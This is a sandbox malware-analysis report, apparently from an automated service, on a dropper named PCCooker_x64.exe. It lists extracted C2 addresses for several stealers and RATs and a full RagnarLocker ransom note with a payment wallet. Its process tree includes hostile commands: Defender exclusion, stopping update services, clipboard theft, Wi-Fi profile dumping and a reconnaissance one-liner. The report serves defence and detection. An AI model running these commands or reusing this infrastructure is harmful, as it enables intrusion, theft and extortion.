Analysis

  • max time kernel
    411s
  • max time network
    415s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2024 01:36

General

  • Target

    PCCooker_x64.exe

  • Size

    22.4MB

  • MD5

    317c5fe16b5314d1921930e300d9ea39

  • SHA1

    65eb02c735bbbf1faf212662539fbf88a00a271f

  • SHA256

    d850d741582546a3d0ea2ad5d25e0766781f315cd37e6c58f7262df571cd0c40

  • SHA512

    31751379ad7f6c55d87e9a5c1f56e6211d515b7d9ae055af962ed6f9205f5abad302c2e47dd56325abff85327ec3b7f9a6cf76ed34b8cbe1da06549c622c7031

  • SSDEEP

    49152:yIT4lj7Rl9HFoDi+3JK5CS2bV5IRtyrp63FDysl28Wvp/pUOmrscrdXuMIgqJ95+:yI6

Malware Config

Extracted

Family

marsstealer

Botnet

Default

C2

kenesrakishev.net/wp-admin/admin-ajax.php

Extracted

Path

C:\Users\Public\Documents\RGNR_7C49C94F.txt

Ransom Note
Hello VGCARGO ! ***************************************************************************************************************** If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED by RAGNAR_LOCKER ! ***************************************************************************************************************** *********What happens with your system ?************ Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US. You can google it, there is no CHANCES to decrypt data without our SECRET KEY. But don't worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY. We are looking only for MONEY, so there is no interest for us to steel or delete your information, it's just a BUSINESS $-) HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!! Also, all of your sensitive and private information were gathered and if you decide NOT to pay, we will upload it for public view ! **** ***********How to get back your files ?****** To decrypt all your files and data you have to pay for the encryption KEY : BTC wallet for payment: 1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4 Amount to pay (in Bitcoin): 25 **** ***********How much time you have to pay?********** * You should get in contact with us within 2 days after you noticed the encryption to get a better price. * The price would be increased by 100% (double price) after 14 Days if there is no contact made. * The key would be completely erased in 21 day if there is no contact made or no deal made. Some sensetive information stolen from the file servers would be uploaded in public or to re-seller. **** ***********What if files can't be restored ?****** To prove that we really can decrypt your data, we will decrypt one of your locked files ! Just send it to us and you will get it back FOR FREE. The price for the decryptor is based on the network size, number of employees, annual revenue. Please feel free to contact us for amount of BTC that should be paid. **** ! IF you don't know how to get bitcoins, we will give you advise how to exchange the money. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US ! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1) Go to the official website of TOX messenger ( https://tox.chat/download.html ) 2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. ) 3) Open messenger, click "New Profile" and create profile. 4) Click "Add friends" button and search our contact 7D509C5BB14B1B8CB0A3338EEA9707AD31075868CB9515B17C4C0EC6A0CCCA750CA81606900D 5) For identification, send to our support data from ---RAGNAR SECRET--- IMPORTANT ! IF for some reasons you CAN'T CONTACT us in qTOX, here is our reserve mailbox ( [email protected] ) send a message with a data from ---RAGNAR SECRET--- WARNING! -Do not try to decrypt files with any third-party software (it will be damaged permanently) -Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER! -Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME ! *********************************************************************************** ---RAGNAR SECRET--- QWZjY0QxRTk2MWU4RTIwYkVCRUNhRWMzRjhCQTdlZDJkNUJCN2JkNDdDMzREMTYyNjNGNTdiZGFDYmI3ZEVhNw== ---RAGNAR SECRET--- ***********************************************************************************
Wallets

1BKK8bsFfG3YxTd3N15GxaYfHopoThXoY4

URLs

https://tox.chat/download.html

Extracted

Family

xworm

Version

5.0

C2

outside-sand.gl.at.ply.gg:31300

Mutex

uGoUQjcjqoZsiRJZ

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain
aes.plain

Extracted

Family

stealc

Botnet

penis

C2

http://185.196.9.140

Attributes
  • url_path

    /c3f845711fab35f8.php

Extracted

Family

lumma

C2

https://commisionipwn.shop/api

https://preachstrwnwjw.shop/api

https://complainnykso.shop/api

https://basedsymsotp.shop/api

https://charistmatwio.shop/api

https://grassemenwji.shop/api

https://ignoracndwko.shop/api

https://stitchmiscpaew.shop/api

https://tenntysjuxmz.shop/api

https://complaintsipzzx.shop/api

Signatures

  • Detect Xworm Payload 50 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Mars Stealer

    An infostealer written in C++ based on other infostealers.

  • Modifies security service 2 TTPs 3 IoCs
  • Phorphiex payload 4 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RagnarLocker

    Ransomware first seen at the end of 2019, which has been used in targetted attacks against multiple companies.

  • SquirrelWaffle is a simple downloader written in C++.

    SquirrelWaffle.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs 24 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Renames multiple (7662) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Squirrelwaffle payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 32 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 28 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 28 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 4 IoCs

    Attempt to gather information on host's network.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 9 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 2 IoCs

    Attempt to get a listing of network connections.

  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 2 IoCs

    Uses WMIC.exe to find detailed system information.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers network information 2 TTPs 4 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3444
      • C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe
        "C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4140
        • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
          "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5084
          • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:2868
            • C:\Windows\sysmablsvr.exe
              C:\Windows\sysmablsvr.exe
              5⤵
              • Modifies security service
              • Windows security bypass
              • Executes dropped EXE
              • Windows security modification
              • System Location Discovery: System Language Discovery
              PID:4996
          • C:\Users\Admin\AppData\Local\Temp\Files\crypted8888.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\crypted8888.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:4660
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:7692
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3504
            • C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3232
            • C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:6252
            • C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
              4⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:6948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force
                5⤵
                  PID:9376
              • C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"
                4⤵
                • Executes dropped EXE
                PID:8384
                • C:\Users\Admin\AppData\Local\Temp\onefile_8384_133702333134812874\stub.exe
                  C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:7748
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "ver"
                    6⤵
                      PID:9196
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                      6⤵
                        PID:10048
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic path win32_VideoController get name
                          7⤵
                          • Detects videocard installed
                          PID:8908
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                        6⤵
                          PID:7756
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic computersystem get Manufacturer
                            7⤵
                              PID:8408
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "gdb --version"
                            6⤵
                              PID:5560
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tasklist"
                              6⤵
                                PID:8704
                                • C:\Windows\system32\tasklist.exe
                                  tasklist
                                  7⤵
                                  • Enumerates processes with tasklist
                                  PID:9008
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                6⤵
                                  PID:9364
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path Win32_ComputerSystem get Manufacturer
                                    7⤵
                                      PID:8024
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                    6⤵
                                      PID:6452
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic csproduct get uuid
                                        7⤵
                                          PID:7400
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                        6⤵
                                          PID:10212
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist
                                            7⤵
                                            • Enumerates processes with tasklist
                                            PID:4368
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                          6⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:4164
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                            7⤵
                                            • Views/modifies file attributes
                                            PID:4180
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                          6⤵
                                            PID:7632
                                            • C:\Windows\system32\mshta.exe
                                              mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                              7⤵
                                                PID:9544
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                              6⤵
                                                PID:10052
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /F /IM chrome.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:6960
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                6⤵
                                                  PID:9340
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    7⤵
                                                    • Enumerates processes with tasklist
                                                    PID:8848
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                  6⤵
                                                  • Clipboard Data
                                                  PID:5804
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Get-Clipboard
                                                    7⤵
                                                    • Clipboard Data
                                                    PID:8700
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                  6⤵
                                                    PID:1680
                                                    • C:\Windows\system32\chcp.com
                                                      chcp
                                                      7⤵
                                                        PID:2752
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                      6⤵
                                                        PID:1736
                                                        • C:\Windows\system32\chcp.com
                                                          chcp
                                                          7⤵
                                                            PID:6284
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                          6⤵
                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                          PID:6328
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profiles
                                                            7⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:8260
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                          6⤵
                                                          • Network Service Discovery
                                                          PID:5584
                                                          • C:\Windows\system32\systeminfo.exe
                                                            systeminfo
                                                            7⤵
                                                            • Gathers system information
                                                            PID:7700
                                                          • C:\Windows\system32\HOSTNAME.EXE
                                                            hostname
                                                            7⤵
                                                              PID:2420
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic logicaldisk get caption,description,providername
                                                              7⤵
                                                              • Collects information from the system
                                                              PID:8220
                                                            • C:\Windows\system32\net.exe
                                                              net user
                                                              7⤵
                                                                PID:8420
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user
                                                                  8⤵
                                                                    PID:5996
                                                                • C:\Windows\system32\query.exe
                                                                  query user
                                                                  7⤵
                                                                    PID:5144
                                                                    • C:\Windows\system32\quser.exe
                                                                      "C:\Windows\system32\quser.exe"
                                                                      8⤵
                                                                        PID:7848
                                                                    • C:\Windows\system32\net.exe
                                                                      net localgroup
                                                                      7⤵
                                                                        PID:6980
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 localgroup
                                                                          8⤵
                                                                            PID:6840
                                                                        • C:\Windows\system32\net.exe
                                                                          net localgroup administrators
                                                                          7⤵
                                                                            PID:8464
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 localgroup administrators
                                                                              8⤵
                                                                                PID:7840
                                                                            • C:\Windows\system32\net.exe
                                                                              net user guest
                                                                              7⤵
                                                                                PID:7036
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 user guest
                                                                                  8⤵
                                                                                    PID:7656
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user administrator
                                                                                  7⤵
                                                                                    PID:8960
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user administrator
                                                                                      8⤵
                                                                                        PID:6836
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic startup get caption,command
                                                                                      7⤵
                                                                                        PID:7740
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        tasklist /svc
                                                                                        7⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:1000
                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                        ipconfig /all
                                                                                        7⤵
                                                                                        • Gathers network information
                                                                                        PID:4060
                                                                                      • C:\Windows\system32\ROUTE.EXE
                                                                                        route print
                                                                                        7⤵
                                                                                          PID:3700
                                                                                        • C:\Windows\system32\ARP.EXE
                                                                                          arp -a
                                                                                          7⤵
                                                                                          • Network Service Discovery
                                                                                          PID:7892
                                                                                        • C:\Windows\system32\NETSTAT.EXE
                                                                                          netstat -ano
                                                                                          7⤵
                                                                                          • System Network Connections Discovery
                                                                                          • Gathers network information
                                                                                          PID:10156
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc query type= service state= all
                                                                                          7⤵
                                                                                          • Launches sc.exe
                                                                                          PID:436
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh firewall show state
                                                                                          7⤵
                                                                                          • Modifies Windows Firewall
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          PID:5912
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh firewall show config
                                                                                          7⤵
                                                                                          • Modifies Windows Firewall
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          PID:4732
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                        6⤵
                                                                                          PID:9988
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic csproduct get uuid
                                                                                            7⤵
                                                                                              PID:5068
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                            6⤵
                                                                                              PID:5808
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic csproduct get uuid
                                                                                                7⤵
                                                                                                  PID:5460
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Checks processor information in registry
                                                                                            PID:5472
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:7224
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1250824767.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\1250824767.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:9836
                                                                                              • C:\Windows\syschvard.exe
                                                                                                C:\Windows\syschvard.exe
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:9204
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6072
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1871929358.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\1871929358.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4792
                                                                                              • C:\Users\Admin\syschvard.exe
                                                                                                C:\Users\Admin\syschvard.exe
                                                                                                6⤵
                                                                                                • Modifies security service
                                                                                                • Windows security bypass
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Windows security modification
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:10212
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2468
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                    8⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5284
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                                                                  7⤵
                                                                                                    PID:9512
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop UsoSvc
                                                                                                      8⤵
                                                                                                      • Launches sc.exe
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:7696
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop WaaSMedicSvc
                                                                                                      8⤵
                                                                                                      • Launches sc.exe
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:6952
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop wuauserv
                                                                                                      8⤵
                                                                                                      • Launches sc.exe
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5908
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop DoSvc
                                                                                                      8⤵
                                                                                                      • Launches sc.exe
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3940
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc stop BITS
                                                                                                      8⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7660
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\pi.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:8992
                                                                                              • C:\Windows\sylsplvc.exe
                                                                                                C:\Windows\sylsplvc.exe
                                                                                                5⤵
                                                                                                • Windows security bypass
                                                                                                • Executes dropped EXE
                                                                                                • Windows security modification
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:5340
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\66cf56ae6e345_ColeusesWalkathon.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\66cf56ae6e345_ColeusesWalkathon.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:8680
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\66cf56ae6e345_ColeusesWalkathon.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\Files\66cf56ae6e345_ColeusesWalkathon.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:8156
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\t2.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:8852
